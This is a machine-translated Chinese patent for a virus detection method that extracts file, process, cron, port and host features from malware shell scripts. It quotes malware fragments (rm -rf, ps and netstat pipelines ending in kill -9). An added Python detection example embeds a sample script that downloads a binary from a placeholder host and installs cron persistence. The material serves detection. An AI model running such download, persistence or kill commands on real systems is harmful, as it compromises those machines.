It can be understood that, in general, the sample shell script of a certain virus (hereinafter referred to as the first virus) includes two major parts of code. The first major part is code that performs malicious behavior, specifically the malicious behavior of the first virus itself. The second major part is code for eliminating other viruses: because viruses are mutually exclusive, the sample shell script of the first virus also carries code for eliminating other viruses, and from this code feature items related to viruses other than the first virus can be obtained; the set formed by these feature items is called the second feature item set.
The second feature item set comprises at least one of a virus file name feature for removing other viruses, a virus process name feature for removing other viruses, a listening port feature, and a communication tool feature.
Further, as shown in fig. 8, a seventh embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a virus filename feature for clearing other viruses;
before step S10, the virus killing method further includes:
S105: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in the historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are all operated.
S205: searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
It can be understood that after the current sample shell script is obtained, a fifth code segment is searched from the current sample shell script through a fifth regular expression, wherein a virus file name characteristic for clearing other viruses exists in the fifth code segment. For example, the fifth code segment is searched through a fifth regular expression 'rm -rf.+', and then a fifth character string located after the fifth preset identifier is intercepted, so that the corresponding virus file name characteristic for clearing other viruses can be obtained. Specifically, the fifth code segment that is searched from the current sample shell script by 'rm -rf.+' is rm -rf /usr/bin/config.json.
S305: extracting a fifth character string positioned after a fifth preset identifier from the fifth code segment;
It is understood that, after the fifth code segment is obtained based on the fifth regular expression, the fifth character string after the fifth preset identifier is further extracted from the fifth code segment. Continuing the above embodiment, when the obtained fifth code segment is rm -rf /usr/bin/config.json, the fifth character string located after the fifth preset identifier is extracted to obtain /usr/bin/config.json; that is, in this embodiment, the fifth preset identifier is -rf, and the extracted fifth character string is /usr/bin/config.json.
S405: and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses to a second feature item set.
It should be understood that, after the fifth character string is obtained, the extracted fifth character string is taken as a virus file name feature for clearing other viruses, and the virus file name feature for clearing other viruses is added to the second feature item set to form a part of the second feature item set.
Further, as shown in fig. 9, an eighth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a virus process name feature for clearing other viruses;
before step S10, the virus killing method further includes:
S106: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in the historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are all operated.
S206: searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
It is understood that after the current sample shell script is obtained, a sixth code segment is searched from the current sample shell script through a sixth regular expression, wherein a virus process name characteristic for clearing other viruses exists in the sixth code segment. For example, the sixth code segment is searched through a sixth regular expression 'ps.+|.+xargs kill', and then a sixth character string located after the sixth preset identifier is intercepted, so that the corresponding virus process name feature for clearing other viruses can be obtained. Specifically, the sixth code segment that is looked up from the current sample shell script by 'ps.+|.+xargs kill' is ps auxf | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9.
S306: extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
It is to be understood that, after the sixth code segment is obtained based on the sixth regular expression, the sixth character string after the sixth preset identifier is further extracted from the sixth code segment. Continuing the above embodiment, when the obtained sixth code segment is ps auxf | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9, the sixth character string located after the sixth preset identifier, which is grep in this embodiment, is extracted to obtain hwlh3wlh44lh; that is, the extracted sixth character string is hwlh3wlh44lh.
S406: and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses to a second feature item set.
It should be understood that, after the sixth character string is obtained, the extracted sixth character string is taken as a virus process name feature for clearing other viruses, and the virus process name feature for clearing other viruses is added to the second feature item set to form a part of the second feature item set.
Further, as shown in fig. 10, a ninth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: monitoring port characteristics;
before step S10, the virus killing method further includes:
S107: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in the historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are all operated.
S207: searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;
It is to be understood that after the current sample shell script is obtained, the seventh code segment is searched from the current sample shell script through the seventh regular expression, wherein the listening port feature exists in the seventh code segment. For example, the seventh code segment is searched through the seventh regular expression 'netstat.+|.+xargs.+kill', and then the seventh character string located after the seventh preset identifier is intercepted, so that the corresponding listening port feature can be obtained. Specifically, the seventh code segment that is looked up from the current sample shell script by 'netstat.+|.+xargs.+kill' is netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %.
S307: extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;
It is understood that, after obtaining the seventh code segment based on the seventh regular expression, a seventh character string located after the seventh preset identifier is further extracted from the seventh code segment. Continuing with the above embodiment, when the obtained seventh code segment is netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %, the seventh string located after the seventh preset mark is extracted to obtain 443; that is, in the present embodiment, the seventh preset mark is grep, and the extracted seventh string is 443.
S407: and acquiring a monitoring port characteristic based on the seventh character string, and adding the monitoring port characteristic to a second characteristic item set.
It should be understood that after the seventh string is obtained, a listening port feature is obtained based on the seventh string, and the listening port feature is added to a second feature item set to form a part of the second feature item set.
Further, the obtaining of the listening port characteristic based on the seventh string includes,
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a monitoring port characteristic.
It can be understood that, after the seventh character string is obtained, it is first determined whether the seventh character string is a preset normal service port, and if the seventh character string is the preset normal service port, the seventh character string is not used as a monitoring port feature, so that the port represented by the seventh character string can normally operate. If the port is not the preset normal service port, the port is possibly a port for the communication between the virus and the outside, and the seventh character string is used as the monitoring port characteristic. Continuing with the above embodiment, for example, the preset normal service port is 23, the obtained seventh character string is 443, it can be seen that the seventh character string is not the preset normal service port, and therefore, the seventh character string can be used as a listening port feature.
Further, as shown in fig. 11, a tenth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, the second feature item set includes: a communication tool feature;
before step S10, the virus killing method further includes:
S108: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in the historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the second feature item set, the current sample shell scripts are all operated.
S208: searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
It can be understood that after the current sample shell script is obtained, an eighth code segment is searched from the current sample shell script through an eighth regular expression, wherein the eighth code segment has a communication tool characteristic. For example, the eighth code segment is searched for through the eighth regular expression '[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}', so that the corresponding communication tool characteristic can be obtained. Specifically, the eighth code segment that is looked up from the current sample shell script by '[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}' is mine.
S308: and taking the eighth code segment as a communication tool characteristic, and adding the communication tool characteristic to a second characteristic item set.
It should be understood that after the eighth code segment is obtained, the extracted eighth code segment is used as a communication tool feature, and the communication tool feature is added to a second feature item set to form a part of the second feature item set.
In addition, an embodiment of the present invention further provides a computer-readable storage medium, where a virus searching and killing program is stored on the computer-readable storage medium, and when executed by a processor, the virus searching and killing program implements the following operations:
acquiring a set of objects to be detected in equipment to be detected;
matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus;
and when the first matching result is successful matching, determining that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
Further, the first feature item set includes: virus file path characteristics; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
extracting a first character string positioned after a first preset identifier from the first code segment;
and obtaining a virus file path characteristic based on the first character string, and adding the virus file path characteristic to a first characteristic item set.
Further, the virus killer program when executed by the processor further implements the following operations:
judging whether the first character string contains a preset character or not;
if the first character string contains the preset character, the first character string is used as a virus file path characteristic;
and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
Further, the first feature item set includes: a virus process name characteristic; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
extracting a second character string positioned behind a second preset identifier from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic to a first characteristic item set.
Further, the first feature item set includes: a timed task feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third string located between third preset identifications from the third code segment;
and taking the extracted third character string as a timing task characteristic, and adding the timing task characteristic to a first characteristic item set.
Further, the first feature item set includes: a network connection tool feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifications from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
Further, the virus killer program when executed by the processor further implements the following operations:
and matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated based on codes for carrying out malicious behaviors in a sample shell script, and the second characteristic item set is generated based on codes for clearing other viruses in the sample shell script.
Further, the second feature item set includes: a virus filename feature for clearing other viruses; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset identifier from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses to a second feature item set.
Further, the second feature item set includes: a virus process name feature for clearing other viruses; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses to a second feature item set.
Further, the second feature item set includes: monitoring port characteristics; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;
extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;
and acquiring a monitoring port characteristic based on the seventh character string, and adding the monitoring port characteristic to a second characteristic item set.
Further, the virus killer program when executed by the processor further implements the following operations:
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a monitoring port characteristic.
Further, the second feature item set includes: a communication tool feature; before the set of objects to be detected in the device to be detected is obtained, the virus killing program further realizes the following operations when executed by the processor:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool characteristic, and adding the communication tool characteristic to a second characteristic item set.
Further, the virus killer program when executed by the processor further implements the following operations:
and removing the object successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.
Further, after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, the virus killer program when executed by the processor further implements the following operations:
judging whether the current sample shell script is in an encrypted state;
and if the judgment result is that the current sample shell script is in an encrypted state, decrypting the current sample shell script.
According to the invention, the set of the object to be detected is matched with the first characteristic item set generated based on the sample shell script corresponding to the virus, and when the matching is successful, the virus in the equipment to be detected is eliminated.
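A worked version of the procedure summarised above, written as an added example for this page and not code from the patent or from Sangfor: it extracts the first and second feature item sets from a constructed sample shell script by regular expression, applies the path-conversion and normal-service-port checks, and matches a constructed set of objects to be detected against both sets. The regular expressions, the preset identifiers (`-O`, `nohup`, the cron line's quotes, `rm -rf`, `pkill -f`, `-p`), the choice of `/` as the preset character, the normal service ports, and the assumption that the page's eighth regular expression uses an escaped dot between its three labels are all this example's own; the decryption step is not covered.

```python
import re

# Constructed sample shell script, standing in for one entry of the historical
# sample database the patent describes. All names and hosts are placeholders.
SAMPLE_SHELL_SCRIPT = """#!/bin/sh
BIN=/tmp/.sample_dir/sample_bin
wget -q http://pool.example.invalid/sample_bin -O $BIN
chmod +x $BIN
echo "*/10 * * * * $BIN" > /var/spool/cron/root
pkill -f rival_sample_proc
rm -rf /tmp/rival_sample_dir
nohup $BIN -p 4444 &
$BIN -p 22 &
"""

# Assumed preset normal service ports (the page's own example uses 23).
NORMAL_SERVICE_PORTS = {"22", "23", "80"}
# Assumed preset character: a string without "/" is not yet a path and is
# converted by expanding $VAR assignments found in the same script.
PATH_PRESET_CHAR = "/"
# Which category of device object each feature kind is matched against.
KIND_TO_OBJECTS = {
    "file_path": "files", "process_name": "processes", "cron_task": "cron",
    "net_tool": "processes", "rival_file": "files", "rival_process": "processes",
    "listen_port": "ports", "comm_tool": "connections",
}


def expand_vars(value, script):
    """Assumed conversion step: substitute $VAR using assignments in the script."""
    assigns = dict(re.findall(r"^(\w+)=(\S+)", script, re.M))
    return re.sub(r"\$(\w+)", lambda m: assigns.get(m.group(1), m.group(0)), value)


def build_feature_sets(script):
    """Steps S1xx-S4xx: regex out code segments, take the string after or between
    the preset identifiers, and file it under the first or second feature set."""
    first = {"file_path": set(), "process_name": set(), "cron_task": set(),
             "net_tool": set()}
    second = {"rival_file": set(), "rival_process": set(), "listen_port": set(),
              "comm_tool": set()}
    # First set: the sample's own malicious behaviour.
    for s in re.findall(r"(?:wget|curl)\b.*?-O\s+(\S+)", script):  # after "-O"
        first["file_path"].add(s if PATH_PRESET_CHAR in s else expand_vars(s, script))
    for s in re.findall(r"nohup\s+(\S+)", script):  # after "nohup"
        first["process_name"].add(expand_vars(s, script))
    for s in re.findall(r'echo\s+"([^"]+)"\s*>+\s*/var/spool/cron', script):
        first["cron_task"].add(expand_vars(s, script))  # between the quotes
    first["net_tool"].update(re.findall(r"\b(wget|curl)\b", script))
    # Second set: code that clears competing viruses, the listening port, and
    # the communication endpoint (three dotted labels, per the page's regex).
    second["rival_file"].update(re.findall(r"rm\s+-rf\s+(\S+)", script))
    second["rival_process"].update(re.findall(r"pkill\s+-f\s+(\S+)", script))
    for port in re.findall(r"-p\s+(\d+)", script):
        if port not in NORMAL_SERVICE_PORTS:  # S507: skip normal service ports
            second["listen_port"].add(port)
    second["comm_tool"].update(
        re.findall(r"[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}\.[a-zA-Z0-9]{1,20}", script))
    return {"first": first, "second": second}


# Constructed "set of objects to be detected" from a hypothetical device.
DEVICE_OBJECTS = {
    "files": ["/usr/bin/ls", "/tmp/.sample_dir/sample_bin"],
    "processes": ["/usr/sbin/sshd -D", "/tmp/.sample_dir/sample_bin -p 4444"],
    "cron": ["0 3 * * * /usr/sbin/logrotate",
             "*/10 * * * * /tmp/.sample_dir/sample_bin"],
    "ports": ["22", "4444"],
    "connections": ["pool.example.invalid:4444"],
}


def match_objects(device_objects, feature_set):
    """Step S20: match the device's objects against one feature item set and
    return the matching objects grouped by object category."""
    hits = {}
    for kind, feats in feature_set.items():
        category = KIND_TO_OBJECTS[kind]
        for obj in device_objects.get(category, []):
            # ports must match exactly; paths, names and cron lines by substring
            if any(obj == f if kind == "listen_port" else f in obj for f in feats):
                if obj not in hits.setdefault(category, []):
                    hits[category].append(obj)
    return hits


def scan_device(device_objects, feature_sets):
    """Step S30: a successful match against the first set means a virus is
    present; the matched objects are what the clearing step would remove.
    Nothing is deleted here; the caller decides how to act on the list."""
    first_hits = match_objects(device_objects, feature_sets["first"])
    second_hits = match_objects(device_objects, feature_sets["second"])
    return {"infected": bool(first_hits), "to_clear": first_hits,
            "second_set_hits": second_hits}


if __name__ == "__main__":
    print(scan_device(DEVICE_OBJECTS, build_feature_sets(SAMPLE_SHELL_SCRIPT)))
```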
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The above-mentioned serial numbers of the embodiments of the present invention are merely for description and do not represent the merits of the embodiments.
Through the above description of the embodiments, those skilled in the art will clearly understand that the method of the above embodiments can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware, but in many cases, the former is a better implementation manner. Based on such understanding, the technical solution of the present invention may be embodied in the form of a software product, which is stored in a storage medium (e.g., ROM/RAM, magnetic disk, optical disk) as described above and includes instructions for enabling a server (e.g., a mobile phone, a computer, a server, an air conditioner, or a network device) to execute the method according to the embodiments of the present invention.
The above description is only a preferred embodiment of the present invention, and not intended to limit the scope of the present invention, and all modifications of equivalent structures and equivalent processes, which are made by using the contents of the present specification and the accompanying drawings, or directly or indirectly applied to other related technical fields, are included in the scope of the present invention.

Claims (16)

1. A virus killing method is characterized by comprising the following steps:
acquiring a set of objects to be detected in equipment to be detected;
matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus;
and when the first matching result is successful matching, determining that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
2. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: virus file path characteristics;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
extracting a first character string positioned after a first preset identifier from the first code segment;
and obtaining a virus file path characteristic based on the first character string, and adding the virus file path characteristic to a first characteristic item set.
3. The virus searching and killing method according to claim 2, wherein the obtaining of the virus file path characteristics based on the first character string comprises,
judging whether the first character string contains a preset character or not;
if the first character string contains the preset character, the first character string is used as a virus file path characteristic;
and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
4. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a virus process name characteristic;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
extracting a second character string positioned behind a second preset identifier from the second code segment;
and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic to a first characteristic item set.
5. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a timed task feature;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
extracting a third string located between third preset identifications from the third code segment;
and taking the extracted third character string as a timing task characteristic, and adding the timing task characteristic to a first characteristic item set.
6. The virus searching and killing method according to claim 1, wherein the first feature item set comprises: a network connection tool feature;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
extracting a fourth character string positioned between fourth preset identifications from the fourth code segment;
and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
7. The virus searching and killing method according to claim 1, wherein the matching the set of objects to be detected with the first set of feature items comprises,
and matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated based on codes for carrying out malicious behaviors in a sample shell script, and the second characteristic item set is generated based on codes for clearing other viruses in the sample shell script.
8. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a virus filename feature for clearing other viruses;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a fifth code segment with virus file name characteristics for clearing other viruses from the current sample shell script through a fifth regular expression;
extracting a fifth character string positioned after a fifth preset identifier from the fifth code segment;
and taking the extracted fifth character string as a virus file name feature for clearing other viruses, and adding the virus file name feature for clearing other viruses to a second feature item set.
9. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a virus process name feature for clearing other viruses;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a sixth code segment with virus process name characteristics for clearing other viruses from the current sample shell script through a sixth regular expression;
extracting a sixth character string positioned after a sixth preset identifier from the sixth code segment;
and taking the extracted sixth character string as a virus process name feature for clearing other viruses, and adding the virus process name feature for clearing other viruses to a second feature item set.
10. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: monitoring port characteristics;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching a seventh code segment with a monitoring port characteristic from the current sample shell script through a seventh regular expression;
extracting a seventh character string positioned after a seventh preset identifier from the seventh code segment;
and acquiring a monitoring port characteristic based on the seventh character string, and adding the monitoring port characteristic to a second characteristic item set.
11. The virus searching and killing method according to claim 10, wherein the obtaining of the listening port characteristic based on the seventh string comprises,
judging whether the seventh character string is a preset normal service port or not;
and if not, taking the seventh character string as a monitoring port characteristic.
12. The virus searching and killing method according to claim 7, wherein the second feature item set comprises: a communication tool feature;
before the acquiring of the set of objects to be detected in the device to be detected, the virus killing method further includes:
traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
searching an eighth code segment with communication tool characteristics from the current sample shell script through an eighth regular expression;
and taking the eighth code segment as a communication tool characteristic, and adding the communication tool characteristic to a second characteristic item set.
13. The virus killing method according to any one of claims 1 to 12, wherein the removing of the virus in the device to be detected comprises,
and removing the object successfully matched with the first characteristic item set in the object set to be detected in the equipment to be detected.
14. The virus killing method according to any one of claims 2 to 6 and 8 to 12, wherein after traversing the sample shell script and taking the traversed sample shell script as the current sample shell script, comprising,
judging whether the current sample shell script is in an encrypted state;
and if the judgment result is that the current sample shell script is in an encrypted state, decrypting the current sample shell script.
15. A virus killing device, comprising: a memory, a processor and a virus killer program stored on the memory and executable on the processor, the virus killer program being configured to implement the steps of the virus killing method of any one of claims 1 to 14.
16. A computer-readable storage medium, having a virus killing program stored thereon, which when executed by a processor, performs the steps of the virus killing method according to any one of claims 1 to 14.
CN202010578310.7A 2020-06-22 2020-06-22 Virus checking and killing method and device and computer readable storage medium Active CN111723372B (en)

Publications (2)

Publication Number Publication Date
CN111723372A true CN111723372A (en) 2020-09-29
CN111723372B CN111723372B (en) 2024-02-23


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant